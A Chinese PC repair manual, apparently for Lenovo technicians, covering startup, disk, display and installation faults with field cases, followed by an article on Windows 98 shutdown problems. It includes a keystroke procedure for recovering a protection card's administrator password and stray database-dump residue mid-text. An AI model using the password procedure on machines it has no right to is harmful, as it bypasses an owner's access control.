G. 当启动中显示不正常时（如黑屏、花屏等），应按显示类故障的判断方法进行检查，但首先要注意显示设备的驱动程序是否正常、显示设置是否正确，最好将显示改变到标准的VGA方式检查。
5) 硬件部件检查：
A. 如果启动的驱动器是通过另外的控制卡连接的，请将驱动器直接连接在缺省的驱动器接口（主板上的）；
B. 当在软件最小系统下启动正常后，应逐步回复到原始配置状态，来定位引起不能正常启动的部件；
C. 要注意检查电源的供电能力，即输出电压是否在允许的范围内，波动范围是否超出允许的范围（参见《维修工具使用手册》）；
D. 驱动器的检查，可参考磁盘类故障的判断方法进行；
E. 硬件方面的考虑，应从内存开始考虑：使用内存检测程序进行判断内存部分是否有故障，内存安装的位置，应从第一个内存槽开始安装，对于安装的多条内存检查内存规格是否一致、兼容等。有关内存规格请参阅附录二的相关部分。
6) 对于不能正常关机的现象，应从下列几个方面检查：
A. 在命令提示符下查看BOOTLOG.TXT文件（在根目录下）。此文件是开机注册文件，它里面记录了系统工作时失败的记录，保存一份系统正常工作时的记录，与出问题后的记录相比较，找出有问题的驱动程序，在WIN.INI SYSTEM.INI 中找到该驱动对应的选项，或在注册表中找到相关联的对应键值，更改或升级该驱动程序，有可能将问题解决；
B. 升级BIOS到最新版本，注意CMOS的设置（特别是APM、USB、IRQ等）；
C. 检查是否有一些系统的文件损坏或未安装（参阅附录二之（三）的相关内容）
D. 应用程序引起的问题，关闭启动组中的应用程序，检查关机时的声音程序是否损坏；
E. 检查是否有某个设备引起无法正常关机，比如网卡、声卡，可通过更新驱动或更换硬件来检查；
F. 通过安装补丁程序或升级xx作系统进行检查；
G. 对于Windows 98SE系统的关机问题，请参阅附录二之（三）。其中的一引起论述对于其它Windows系统也有帮助。
五、本类故障的判断流程
见附录一之（二）。
六、案例
案例一：
问题描述：客户计算机安装WIN 2000 PROFESSIONALxx作系统，每次启动均蓝屏，报MEMORY ERROR。
解决方案：到达客户处，故障复现，向客户了解情况，客户反映发生故障前曾经安装过一根内存条，之后发生此类故障。关机后拔下内存条，重新开机，仍旧蓝屏，但是不再报MEMORY ERROR。考虑到WIN 2000对硬件要求较高，而且故障是在加装内存后出现的故障，基本可以断定机器的原配硬件和软件系统没有问题。再次重新启动计算机，开机时按下F8键，选择进入“VGA模式”，此次计算机能够正常启动，并且登陆正常。在进行了一次正常登陆后，重新启动到标准模式，计算机启动正常，至此，故障排除。
案例二：
问题描述：客户机器被运行一段恶意程序，导致每次启动后均出现一个对话框，且该对话框无法关闭，只能强制结束，客户机器有重要程序，不愿意重新安装xx作系统。
解决方案：首先怀疑是否是病毒，运行常用杀毒软件均不能查杀。在“开始”――“运行”中输入“MSCONFIG”，但是在“启动”组中仍然不能找到该程序。运行“SCANREG”，将注册表恢复到最老的版本故障依旧。最后只好手工编辑注册表，运行“REGEDIT”，在“HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows
\\CurrentVersion\\RUN下，找到对应的程序文件名，删除对应的键值后，重新启动，故障排除。（注：建议在更改注册表前，使用注册表编辑器的“导出”功能进行注册表备份。）

第三章 磁盘类故障
一、定义举例
这里所指的磁盘类故障表示两个方面：一是硬盘、光驱、软驱及其介质等引起的故障；另一是影响对硬盘、光驱、软驱访问的部件（如主板、内存等）引起的故障。
二、可能的故障现象
1、 硬盘驱动器
1) 硬盘有异常声响，噪音较大；
2) BIOS中不能正确地识别硬盘、硬盘指示灯常亮或不亮、硬盘干扰其它驱动器的工作等；
3) 不能分区或格式化、硬盘容量不正确、硬盘有坏道、数据损失等；
4) 逻辑驱动器盘符丢失或被更改、访问硬盘时报错；
5) 硬盘数据的保护故障；
6) 第三方软件造成硬盘故障；
7) 硬盘保护卡引起的故障。
2、 软盘驱动器
1) 软驱指示灯不亮或常亮、软驱读盘声音大；
2) 软驱划盘、软盘不能弹出或插入等；
3) 软盘不能被格式化、软驱不读盘、软驱干扰其它驱动器或设备或应用的正常工作等；
4) 在一个软驱中写的文件不能在另一个软驱中读出；
5) 软驱盘符丢失或被更改、访问软驱时报错；
6) 软驱安装不到位。
3、 光盘驱动器
1) 光驱噪音较大、光驱划盘、光驱托盘不能弹出或关闭、光驱读盘能力差等；
2) 光驱盘符丢失或被更改、系统检测不到光驱等；
3) 访问光驱时死机或报错等；
4) 光盘介质造成光驱不能正常工作。
三、可能涉及的部件
硬盘、光驱、软驱及其它们的设置，主板上的磁盘接口、电源、信号线。
四、判断要点/顺序
1、 维修前的准备
1) 磁盘数据线；
2) 相应的磁盘检测软件；
3) 查毒软件等。
2、 硬盘驱动器
1) 环境检查
A. 检查硬盘连接：
a) 硬盘上的ID跳线是否正确，它应与连接在线缆上的位置匹配；
b) 连接硬盘的数据线是否接错或接反；
c) 硬盘连接线是否有破损或硬折痕。可通过更换连接线检查；
d) 硬盘连接线类型是否与硬盘的技术规格要求相符；
e) 硬盘电源是否已正确连接，不应有过松或插不到位的现象。
B. 硬盘外观检查：
a) 硬盘电路板上的元器件是否有变形、变色，及断裂缺损等现象；
b) 硬盘电源插座之接针是否有虚焊或脱焊现象；
c) 加电后，硬盘自检时指示灯是否不亮或常亮；工作时指示灯是否能正常闪亮；
d) 加电后，要倾听硬盘驱动器的运转声音是否正常，不应有异常的声响及过大的噪音。
C. 硬盘的供电检查：
a) 供电电压是否在允许范围内，波动范围是否在允许的范围内等。
2) 故障判断要点
A. 建议在软件最小系统下进行检查，并判断故障现象是否消失。这样做可排除由于其它驱动器或部件对硬盘访问的影响。
B. 参数与设置检查：
a) 硬盘能否被系统正确识别，识别到的硬盘参数是否正确；BIOS中对IDE通道的传输模式设置是否正确（最好设为“自动”）；
b) 显示的硬盘容量是否与实际相符、格式化容量是否与实际相符（注意，一般标称容量是按1000为单位标注的，而BIOS中及格式化后的容量是按1024为单位显示的，二者之间有3%~5%的差距。另格式化后的容量一般会小于BIOS中显示的容量）。硬盘的容量根据系统所提供的功能（如带有一键恢复），应比实际容量小很多，缩小的值请参看用户手册中的相关说明；
c) 检查当前主板的技术规格是否支持所用硬盘的技术规格，如：对于大于8GB硬盘的支持、对高传输速率的支持等；
C. 硬盘逻辑结构检查：参考启动类故障判断要点中的相关部分。
a) 检查磁盘上的分区是否正常、分区是否激活、是否格式化、系统文件是否存在或完整；
b) 对于不能分区、格式化xx作的硬盘，在无病毒的情况下，应更换硬盘。更换仍无效的，应检查软件最小系统下的硬件部件是否有故障；
c) 必要时进行修复或初始化xx作，或完全重新安装xx作系统；
D. 系统环境与设置检查：参考启动类故障判断要点中的相关部分。
a) 注意检查系统中是否存在病毒，特别是引导型病毒（如用查KV3000 /K命令，或用MEM.EXE命令等进行检查）；
b) 认真检查在xx作系统中有无第三方磁盘管理软件在运行；设备管理器中对IDE通道的设置是否恰当；
c) 是否开启了不恰当的服务。在这里要注意的是，ATA驱动在有些应用下可能会出现异常，建议将其卸载后查看异常现象是否消失；
E. 硬盘性能检查：
a) 当加电后，如果硬盘声音异常、根本不工作或工作不正常时，应检查一下电源是否有问题、数据线是否有故障、BIOS设置是否正确等，然后再考虑硬盘本身是否有故障；
b) 应使用相应硬盘厂商提供的硬盘检测程序检查硬盘是否有坏道或其它可能的故障；
F. 对于关于硬盘保护卡所引起的问题，应从以下几方面考虑：
a) 安装硬盘保护卡，应注意将CMOS中的病毒警告关闭、将CMOS中的映射地址设为不使用（disable）、将CMOS中的第一启动设备为设为LAN；光驱和硬盘应接在不同的IDE数据线上。
b) 如果忘记的硬盘保护卡的管理员密码，对于1.0版ALT+133，ALT+144，ALT+155，弹出10组数（必须用小键盘），对于3.0版，在管理员密码处输入ENPQ，得到一组数据，然后拨打800，来得到密码；
c) 装有硬盘保护卡的机器，开机出现红屏现象，应使用专用的工具程序解决。方法请参阅相关的《技术工程信息通报》；
d) 对于在某个引导盘下，看不到某些数据盘的情况，要检查：这些数据盘是否为该引导盘专属的数据盘；分区类型是否为引导盘的xx作系统所识别；在大于8GB的硬盘上，在8GB之后是否建立了属于该引导盘的FAT16分区（当然引导盘支持FAT16文件系统）；该引导盘的专属分区是否多于3 个；
e) 硬盘保护卡不起保护功能，要检查用户是否关闭了硬盘保护功能，要启用硬盘保护功能，可在进入系统前按一下F4来启用（事先应已安装过），如果不行，可重新插拔一下硬盘保护卡。在Windows下，则应检查其驱动软件是否已安装；
f) 当启有了硬盘保护功能后，硬盘上原来的系统不被保留，应询部用户原系统是否是用第三方软件进行的分区。目前硬盘保护卡只能保护用xx作系统自带的FDISK进行分区的系统；
g) 在硬盘保护模式为每次还原，如果由于未正常关机，而出现多次提示进行磁盘扫描，应在管理员模式下，在Msdos.sys文件中加入autoscan=0的项；
h) 对于在使用者模式下，出现乱码的现象，需在管理员模式下运行升级盘中的SETUP.EXE；
3、 软盘驱动器
1) 环境检查
A. 软驱的在一定情况下，类似于硬盘的检查方法。
B. 检查软驱的连接：
a) 连接电缆安装是否正确，不应有插错或插反的现象；
b) 软驱连接的位置，应与BIOS中设置的值相符；
c) 软驱的电源连接是否正确。
C. 软驱外观检查
a) 软驱中是否有异物；
b) 电路板上及其元器件是否有变形、变色、异味等现象。
D. 所使用的软盘介质的质量是否太差；
2) 故障判断要点
A. 软驱的检查，应在软件最小系统中加入软驱，或去掉硬盘后进行检查判断。且在必要时，移出机箱外检查；
B. 类似硬盘驱动器的检查。但要注意：BIOS中对软驱是否可读写的设置是否为允许或禁止；
C. 检查软驱的读、写能力，一方面是自身读写能力的检查，另一方面是软盘的互换读写能力的检查，即在可能有故障的软驱中写过的软盘能否在另一正常的软驱中读出。如果不能，更换软驱；
D. 软盘是最易感染病毒的介质，因此的检查中，一定要注意对病毒的检查。
4、 光盘驱动器
1) 环境检查
A. 检查光驱连接：
a) 光驱上的ID跳线是否正确，它应与连接在线缆上的位置匹配；
b) 连接光驱的数据线是否接错或接反；
c) 光驱连接线是否有破损或硬折痕。可通过更换连接线检查；
d) 光驱连接线类型是否与光驱的技术规格要求相符；
e) 光驱电源是否已正确连接，不应有过松或插不到位的现象。
B. 光驱外观检查：
b) 光驱电路板上的元器件是否有变形、变色，及断裂缺损等现象；
c) 光驱电源插座之接针是否有虚焊或脱焊现象；
d) 加电后，光驱自检时指示灯是否不亮或常亮；工作时指示灯是否能正常闪亮；
e) 加电后，要倾听光驱驱动器的运转声音是否正常，不应有异常的声响及过大的噪音。
2) 故障判断要点
A. 光驱的检查，应用光驱替换软件最小系统中的硬盘进行检查判断。且在必要时，移出机箱外检查。检查时，用一可启动的光盘来启动，以初步检查光驱的故障。如不能正常读取，则在软件最小系统中检查。最先考察的是光驱；
B. 类似硬盘驱动器的检查方法；
C. 光驱性能检查：
a) 对于读盘能力差的故障，先考虑防病毒软件的影响，然后用随机光盘进行检测，如故障复现，更换维修，否则根据用户的需要及所见的故障进行相应的处理；
b) 必要时，通过刷新光驱的formware检查不驱的故障现象是否消失（如由于光驱中放入了一张CD光盘，导致系统第一次启动时，光驱工作不正常，就可偿试此方法）；
D. xx作系统中配置检查：
a) 在xx作系统下的应用软件能否支持当前所用光驱的技术规格；
b) 设备管理器中的设置是否正确，IDE通道的设置是否正确。必要时卸载光驱驱动重启，以便让xx作系统重新识别。
五、本类故障的判断流程
见附录一之（三）。
六、案例
案例一:
问题描述：小王是一家公司的计算机维护人员，办公用机为联想的奔月2000机型，13G硬盘，由于长时间电脑中系统和数据未进行维护，系统启动和运行都比较慢，将C盘上的重要数据复制到D盘，之后运行联想的系统恢复软件，将隐藏分区里的Windows98SE系统复制到C盘上。10分钟不到恢复完毕，再次重新启动，正常进入Windows98系统。但是进入系统后，发现原来用PM划分的扩展分区不见了大量的数据资料都在扩展分区中，如何是好？小王陷入尴尬的境地……
解决方案：首先查看联想机器随机资料，说明书上写着“可能对PM等的分区格式不支持，分区时请用Fdisk……”，可能是进行系统恢复时破坏了原来的硬盘分区表，有没有什么办法解决呢Ｉ诵莫机进入MSDos或者进入PM，出了一个主分区和一个扩展分区没有其他的分区信息，这时想到软件Diskman，进入MSDos，运行Diskman，首先警告说分区表有误，Diskman虽然仍然把硬盘识别成两个分区，但它还有重新检测分区表的功能。重新检测分区表有全自动和交互两种方式，选择后者，Diskman就开始逐柱面检测硬盘上原已存在的分区表。过了很长的时间，原有的三个分区包括联想系统恢复软件隐藏的备份分区都被检测了出来，保持分区格式，一切正常。
点评：用户应用中或是在用户对硬盘分区时断电都会导致硬盘分区表的错误，遇到此种问题时不要着急，要分析问题的原因，查看相关的资料，如相关软件和计算机附带的资料，借助相关的软件或工具解决，若是对硬盘的工作原理、相关软件或工具的应用不是很了解，一定要查找相关资料或是向人询问。
注：Diskman硬盘分区表维护软件，运行于MSDOS环境，采用全中文图形界面，无须任何汉字系统支持。以图表的形式揭示了分区表的详细结构，支持鼠标xx作，支持8G以上的大硬盘和UNIX、NTFS等多种分区格式等。

案例二：
问题描述：一用户天禧二5311机型，用户反映用随机的软件NTI CD-Maker Plus中的FileCD工具格式化可擦写光盘的时候(明基CD-RW)，进度很快到100％，但是没有格式化完毕的提示，强行关闭对话框也无法关闭。最后等了只得结束任务。用NTI CD-Maker Plus刻录硬盘，刻录过程中显示刻录进度，并提示刻录完毕后，将刻录好的光盘放入光驱，提示无法识别光盘。
解决方案：首先考虑是NTI CD-Maker中的插件FileCD的软件问题，升级NTI CD-Maker软件到V5.08，V5.13,都没能解决，升级到V5.15现象依旧，再看FileCD的版本和用户原机的FileCD的版本一样，为2.0.10后续的版本并未在擦写光盘的功能上有所改进。考虑选用另外的刻录软件，用NERO来进行测试（版本为V5.5.9.0），用该软件执行快速擦写后再对光盘进行刻录，依旧发生上述的现象。但是用SONY的CD-RW光盘则无此问题。
点评：擦写光盘时和刻录软件及刻录机都有很大的关系，请工程师在解决问题时可以从多个角度考虑问题。

案例三：
问题描述：一用户光驱过保，用户自行购买光驱，据用户称在市场上购买光驱时进行测试，光驱没有任何问题，测试的数据盘和VCD等光盘都可以正常读出，但是回到家加装光驱后，开机进入系统，所有放入光驱中的碟片在驱动器的盘符上都只显示CD样的标记。用户回到购买处将光驱安装到测试机器上，问题复现。
解决方案：经过检查发现，光驱的数据接口上一根数据线弯，导致驱动器中数据无法正常识别。
','2004-8-25 8:56:33','face1.gif','*.*.*.*','85',1,0,75,2,'管理员','32','32','582','2004-8-24','2280','4765','1659','2000-01-01','1',0,'0','level10.gif',1,'2005-2-5 8:03:45','0',4,'tablebody1','1','0')); 第四章 显示类故障
一、定义举例
这类故障不仅包含由于显示设备或部件所引起的故障，还包含有由于其它部件不良所引起的在显示方面不正常的现象。也就是说，显示方面的故障不一定就是由于显示设备引起的，应全面进行观察和判断。
二、可能的故障现象
1、 开机无显、显示器有时或经常不能加电；
2、 显示偏色、抖动或滚动、显示发虚、花屏等；
3、 在某种应用或配置下花屏、发暗（甚至黑屏）、重影、死机等；
4、 屏幕参数不能设置或修改；
5、 亮度或对比度不可调或可调范围小、屏幕大小或位置不能调节或范围较小；
6、 休眠唤醒后显示异常；
7、 显示器异味或有声音。
三、可能涉及的部件
显示器、显示卡及其它们的设置；主板、内存、电源，及其它相关部件。特别要注意计算机周边其它设备及地磁对计算机的干扰。
四、判断要点/顺序
1、 维修前的准备
相应显示卡的最新版驱动程序
2、 环境检查
1) 市电检查：
A. 市电电压是否在220V±10%、50Hz或60Hz；市电是否稳定；
B. 其余参考加电类故障中有关市电检查部分。
2) 连接检查：
A. 显示器与主机的连接牢伤心、正确（特别注意，当有两个显示端口时，是否连接到正确的显示端口上）；电缆接头的针脚是否有变形、折断等现象，应注意检查显示电缆的质量是否完好；
B. 显示器是否正确连接上市电，其电源指示是否正确（是否亮及颜色）；
C. 显示设备的异常，是否与未接地线有关。特别注意：不允许电脑维修工程师为用户安装地线，应请用户通过正式电工来安装；
3) 周边及主机环境检查：
A. 检查环境温、湿度是否与使用手册相符（如钻石珑管，要求的使用温度为18~40C）；
B. 显示器加电后是否有异味、冒烟或异常声响（如爆裂声等）；
C. 显示卡上的元器件是否有变形、变色，或温升过快的现象；
D. 显示卡是否插好，可以通过重插、用橡皮或酒精擦拭显示卡（包括其它板卡）的金手指部分来检查；主机内的灰尘是否较多，进行清除；
E. 周围环境中是否有干扰物存在（这些干扰物包括：日光灯、UPS、音箱、电吹风机、相伤心过近（50厘米以内）的其它显示器，及其它大功率电磁设备、线缆等）。注意显示器的摆放方向也可能由于地磁的的影响而对显示设备产生干扰；
F. 对于偏色、抖动等故障现象，可通过改变显示器的方向和位置，检查故障现象能否消失。
4) 其它检查及注意事项：
A. 主机加电后，是否有正常的自检与运行的动作（如有自检完成的鸣叫声、硬盘指示灯不停闪烁等），如有，则重点检查显示器或显示卡；
B. 禁止带电搬动显示器及显示器方向，在断电后的一段时间内（2~3分钟）也最好不要搬动显示器。
3、 故障判断要点
1) 调整显示器与显示卡：
A. 通过调节显示器的OSD选项，最好是回复到RECALL（出厂状态）状态来检查故障是否消失。对于液晶显示器，需按一下auto config按钮；
B. 显示器的参数是否调得过高或过低（如H/V-MOIRE，这是不能通过RECALL来恢复的）；
C. 显示器各按钮可否调整，调整范围是否偏移显示器的规格要求；
D. 显示器的异常声响或异常气味，是否超出了显示器技术规格的要求（如新显示器刚用之时，会有异常的气味；刚加电时由于消磁的原因而引起的响声、屏幕抖动等，但这些都属正常现象）。有关显示器的规格，请见附录二之（二）；
E. 显示卡的技术规格是否可用在主机中（如AGP 2.0卡是否可用在主机的AGP插槽中等）。
2) BIOS配置调整：
A. BIOS中的设置是否与当前使用的显示卡类型或显示器连接的位置匹配（即是用板载显示卡、还是外接显示卡；是AGP显示卡还是PCI显示卡）；
B. 对于不支持自动分配显示内存的板载显示卡，需检查BIOS中显示内存的大小是否符合应用的需要；
以下的检查应在软件最小系统下进行。
3) 检查显示器/卡的驱动：
A. 显示器/卡的驱动程序是否与显示设备匹配、版本是否恰当；
B. 显示器的驱动是否正确，如果有厂家提供的驱动程序，最好使用厂家的驱动；
C. 是否加载了合适的Direct X驱动（包括主板驱动）；
D. 如果系统中装有Direct X驱动，可用其提供的Dxdiag.exe命令检查显示系统是否有故障。该程序还可用来对声卡设备进行检查。
4) 显示属性、资源的检查：
A. 在设备管理器中检查是否有其它设备与显示卡有资源冲突的情况，如有，先去除这些冲突的设备；
B. 显示属性的设置是否恰当（如：不正确的监示器类型、刷新速率、分辨率和颜色深度等，会引起重影、模糊、花屏、抖动、甚至黑屏的现象）；
5) xx作系统配置与应用检查：
A. 系统中的一些配置文件（如：System.ini文件）中的设置是否恰当；
B. 显示卡的技术规格或显示驱动的功能是否支持应用的需要；
C. 是否存在其它软、硬件冲突。
6) 硬件检查：
A. 当显示调整正常后，应逐个添加其它部件，以检查是何部件引起显示不正常；
B. 通过更换不同型号的显示卡或显示器，检查是否存在它们之间的匹配问题；
C. 通过更换相应的硬件检查是否由于硬件故障引起显示不正常（建议的更换顺序为：显示卡、内存、主板）。
五、本类故障的判断流程
见附录一之（四）。
六、案例
案例一：
问题描述：碰到过这样的一台机器，现象比较怪，机型为奔月2000 PIII/800，故障为经常性的开机无显，有时能显示进入系统，但使用1-2小时会出现死机，重启又无显示，只有过很长时间再开机，才可以显示。
解决方案：碰到此问题，首先断定应为硬件问题，打开机箱，查看各板卡并无松动（注：显卡与主板插槽上的联想贴条，粘得很紧），换件试吧，先后更换过内存、CPU、电源，均不能解决问题，再换主板吧，拆撕显卡与主板插槽的联想贴条时，感觉到显卡没插到位，向下按，还能再进去一点，遂怀疑是不是显卡与主板接触不良所致，于是又把机器的原部件全都还原，试机，一切正常。
后记：此案例就是因为显卡的接触不良，而造成的奇怪故障，在维修中因为检测时的疏漏（只查看显卡是否插紧，而未实际动手检查一下），造成了维修过程的繁琐。

案例二：
问题描述：一台奔月机器，用户称每次启动都无法进入WIN98，光标停留在屏幕左上角闪动，死机；但安全模式可以进入。
解决方案：怀疑为显卡或监视器设置不当所致，进入安全模式把显示分辨率设为640*480，颜色设为16色，重启，能以正常模式进入，但只要改动一下分辨率或颜色，则机器就不能正常启动；察看机器内部，除用户自加一块网卡外，别无其它配置，难道是网卡与显卡发生了冲突？拔掉网卡，能正常启动WIN98，给网卡换个插槽，开机检测到新硬件，加载完驱动，启动，一切正常。
后记：由于显卡与其它部件不兼容或冲突造成的死机，完全可以先采用最小系统化的方法来测试（最小系统化法即只保留主板、CPU、显卡、电源等主要部件），先排除主要的部件，再逐一检测其它扩展卡。

案例三：
问题描述：三角洲部队-大地勇士，在810（e）系列主板的机器上运行（同禧、逐日系列），如用随机带的显卡驱动程序安装（而用随机盘进 行驱动的安装又是我们一贯的作风），在进入游戏画面时，必然会导致死机。
解决方案：解决方法就是从网上下载新版本的驱动，进行升级。
后记：如果在实际维修中遇到玩3D游戏死机的故障，估计可能是显卡故障，而又无备件替换时（这在我们上门维修中，是经常遇到的），不妨从网上下载一个Direct control软件，通过它屏蔽掉AGP支持。再玩3D游戏，如不出现死机，说明问题很可能出在别处（如主板、内存）。如死机，则在很大程度上说明，这块显卡是有故障的了。

案例四：
故障描述: 开天2200 P4/1.7G （为QDI P7LI-AL主板），在运行华光超恩组版软件时（带一ISA加密卡），如进行放大显示，则左边界线无法显示。
解决方案: 用户新购机器，代理商在为用户安装超恩组版软件时，出现问题。换一新机，故障依旧，代理判断为华光ISA卡与此机型不兼容，让维修站上门解决。到用户处，复现故障，插一PCI显卡则显示正常，估计不为机器故障。在系统属性—性能—图形中，把硬件加速调低两格，问题解决。
第五章 安装类故障
一、定义举例
这类故障主要是反映在安装xx作系统或应用软件时出现的故障
二、可能的故障现象
1、 安装xx作系统时，在进行文件复制过程中死机或报错；在进行系统配置时死机或报错；
2、 安装应用软件时报错、重启、死机等（包括复制和配置过程）；
3、 硬件设备安装后系统异常（如黑屏、不启动等）；
4、 应用软件卸载后安装不上，或卸载不了等。
三、可能涉及的部件
磁盘驱动器、主板、CPU、内存，及其它可能的部件、软件。
四、判断要点/顺序
1、 维修前的准备
1) 注意携带磁盘数据线；
2) 相适应的最新版设备驱动程序。
2、 环境检查
1) 软件安装
A. 检查硬件设备的连接与外观：
a) 检查与主机连接的其他设备工作是否正常；
b) 设备间的连接线是否接错或漏接。连接插头、座的接针是否有变形、缺失、短路等现象；
c) 仔细检查报错信息，判断可能造成故障的部位；
d) 观察系统是否有异味，元器件的温度；
e) CPU风扇的转速是否过慢或不稳定；
f) 驱动器工作时是否有不正常的声响。
B. 其它方面检查：
a) 认真对照软件的使用手册，确认机器的软、硬件配置符合该手册的要求；
b) 仔细观察安装介质是否完好。
2) 设备安装
A. 检查设备的连接与外观：
a) 要安装的设备、部件是否连接正确，连接电缆是否完好、接针是否有缺针、断针、或短接的现象；
b) 要安装的设备、部件的制作工艺是否优良；
c) 余类似上述软件安装。
B. 驱动程序介质检查：用于安装设备的驱动程序介质是否完好。
3、 故障判断要点
1) xx作系统安装：
A. 检查CMOS中的设置：
a) 如果需要，请先恢复到出厂设置；
b) 关闭BootEasy功能、关闭防病毒功能，及关闭BIOS防写开关；
c) 特别注意硬盘的参数、CPU的温度等。注意观察自检时显示出来的信息是否与实际的硬件配置相符。
B. 安装介质与目标介质检查：
a) 检查是否有病毒；
b) 检查分区表是否正确、分区是否激活。使用Fdisk /mbr命令来确保主引导记录是正确的（注意使用此命令后，如果机器不能启动，可证明原系统中存在病毒或有错误。硬盘应做初始化xx作）；
c) 检查系统中是否有第三方内存驻留程序。
以下过程，建议在软件最小系统下检查（注：在最小系统下，需要添加与安装有关的其它驱动器）。
C. 安装过程检查：
a) 如果在复制文件时，报CAB等文件错，可偿试将原文件复制到另一介质（如硬盘）上再行安装。如果正常通过，则原安装介质有问题，可去检查介质及相应的驱动器是否有故障；若仍然不能复制，应检查相应的磁盘驱动器、数据线、内存等部件；
b) 如果是采用覆盖安装而出现上述问题，建议如果更换安装介质后仍不能排除故障，应先对硬盘进行初始化xx作，再重新安装（初始化xx作时，最好将硬盘分区彻底清除后进行）。如果仍不能解决，再考虑硬件.


电脑关机故障速解

《一键清理系统垃圾》

电脑关机故障速解

许多用户使用电脑时经常会在试图关闭Windows时计算机没有响应或出现一个闪烁光标的空白屏幕，这就是关机功能失效或不正常的故障。该如何来解决这类故障呢？

一、关机过程及故障原因

    Windows的关机程序在关机过程中将执行下述各项功能：完成所有磁盘写操作，清除磁盘缓存，执行关闭窗口程序，关闭所有当前运行的程序，将所有保护模式的驱动程序转换成实模式。

    引起Windows系统出现关机故障的主要原因有：选择退出Windows时的声音文件损坏；不正确配置或损坏硬件；BIOS的设置不兼容；在BIOS中的“高级电源管理”或“高级配置和电源接口”的设置不适当；没有在实模式下为视频卡分配一个IRQ；某一个程序或TSR程序可能没有正确关闭；加载了一个不兼容的、损坏的或冲突的设备驱动程序等等。

二、故障分析与解决

1.退出Windows时的声音文件损坏

    首先，你可确定“退出Windows”声音文件是否已毁坏——单击“开始”→“设置”→“控制面板”，然后双击“声音”。在“事件”框中，单击“退出Windows”。在“名称”中，单击“（无）”，然后单击“确定”，接着关闭计算机。如果Windows正常关闭，则问题是由退出声音文件所引起的，要解决这一问题，请选择下列某项操作：从备份中恢复声音文件；重新安装提供声音文件的程序；将Windows配置为不播放“退出Windows”的声音文件。

2.快速关机不正常

    而快速关机是Windows 98中的新增功能，可以大大减少关机时间。但是，该功能与某些硬件不兼容，如果计算机中安装了这些硬件，可能会导致计算机停止响应。你可禁用快速关机，先单击“开始”→“运行”，在“打开”框中键入“Msconfig”，然后单击“确定”（见图1）。单击“高级”→“禁用快速关机”，单击“确定”，再次单击“确定”。系统提示重新启动计算机，可重新启动。如果计算机能正常关机，则快速关机功能可能与计算机上所安装的一个或多个硬件设备不兼容。

3.注意“高级电源管理”

    计算机上的“高级电源管理（APM）”功能也可引起关机死机或黑屏问题。而要确定APM是否会引起关机问题，可单击“开始”→“设置”→“控制面板”，然后双击“系统”。在“设备管理器”选项卡上，双击“系统设备”。双击设备列表中的“高级电源管理”，单击“设置”选项卡，然后单击以清除“启用电源管理”复选框。连续单击“确定”，直到返回“控制面板”。重启动计算机。关闭计算机，如果计算机正常关机，则问题的原因可能在于APM。

4.启动关机故障

    大家在使用电脑时，还会经常遇到在Windows刚刚启动的时侯就显示“你可以安全地关闭计算机了”，或者启动时马上关机或关机时重新启动等故障。这类故障的原因一般来说是由于Wininit.exe或Vmm32.vxd文件的损坏所造成的。解决办法是重新从Windows安装程序压缩包中调取这两个文件。进入Windows\system子目录下，将Vmm32.vxd改名为Vmm32.XXX进行备份，然后再单击“开始”→“程序”→“附件”→“系统工具”→“系统信息”。单击菜单栏中的“工具”，然后选择“系统文件检查器”，单击“从安装盘提取一个文件”（见图2），然后在“要提取的文件”框中输入“Wininit.exe”或“Vmm32.vxd”。单击“开始”，然后按照屏幕上的提示进行操作，以便从Windows CD-ROM或安装盘将文件提取到C:\Windows\System文件夹，然后重复此步骤，以替换文件Wininit.exe或Vmm32.vxd。

5.Bootlog.txt文件出错

    此外，在Bootlog.txt文件中存在定位问题也可引起关机黑屏故障。你可先使用文本编辑器，如“记事本”，检查Bootlog.txt文件中的“Terminate=”条目。这些条目位于文件的结尾，可为问题的起因提供一定的线索。对每一个“Terminate=”条目，查找所匹配的“EndTerminate=”条目。

Terminate=Query Drivers表明内存管理程序有问题；
Terminate=Unload表明Network与Config.sys中的实模式或网络驱动程序存在冲突；
Terminate=Reset Display表明可能需要更新视频驱动程序；
Terminate=Rit表明声卡或鼠标驱动程序存在问题；
Terminate=Win32表明与32位程序有关的问题阻塞了线程。
如果Bootlog.txt文件的最后一行为“EndTerminate=KERNEL”，Windows 98就可成功关闭。

6.Config.sys或Autoexec.bat有问题

    此外，你可检查Config.sys文件或Autoexec.bat文件中是否存在冲突？先确定Config.sys文件或Autoexec.bat文件中是否存在冲突，可单击“开始”，然后单击“运行”。在“打开”框中，键入“Msconfig”，然后单击“确定”。单击“诊断启动”，然后“确定”。系统提示重新启动计算机时，请单击“确定”。如果计算机的启动或关闭不正确，请确定问题是由Config.sys或Autoexec.bat文件的哪一行引起的。

    要确定引起问题的行，可重新启动计算机。计算机重新启动时，请按住Ctrl键。从“Startup”菜单中选择“Safe Mode安全模式”。启动后单击“开始”，然后再击“运行”。在“打开”框中，键入“Msconfig”，然后单击“确定”。单击以清除Config.sys和Autoexec.bat选项卡中不含Windows图标行的复选框。使用此Config.sys文件，单击以启用某行。单击“确定”。当系统提示重新启动计算机时，单击“确定”。如果计算机的启动和关闭都很正常，请启用另一行，并重复上述步骤的操作，以逐步启用Config.sys文件和Autoexec.bat文件中的行，直到发现问题为止。

7.内部系统问题

    此外，可确定是否存在内部系统问题。单击“开始”→“运行”。在“打开”框中，键入“Msconfig”，然后单击“确定”。在“常规”选项卡中单击“高级”。单击以清除“高级疑难解答设置”中的下列复选框，然后单击“确定”：禁用系统ROM中断点；禁用虚拟HD IRQ；EMM不包含A000-FFFF。系统提示重新启动计算机时，单击“确定”。如果计算机正常启动，可重复以上步骤，但在步骤中“单击以清除‘高级疑难解答设置’中的下列复选框”时单击以选中某复选框。重复此过程，每次选中其它某复选框，直到发现计算机无法正常关闭为止。一旦发现计算机无法重新启动或关闭，可再次重复以上步骤单击以清除刚才选中的复选框即可。

8.检查CMOS设置

    CMOS设置不正确一样也会引起电脑关机问题，大家在电脑启动时可按“Del”键进入CMOS设置页面，重点检查CPU外频、电源管理、病毒检测、IRQ中断开闭、磁盘启动顺序等选项设置是否正确。具体设置方法你可参看你的主板说明书，其上面有很详细的设置说明。如果你对其设置实在是不太懂，建议你可直接在CMOS载入或取下CMOS电池、短接跳线，选用厂家出厂默认设置即可。

9.硬件问题

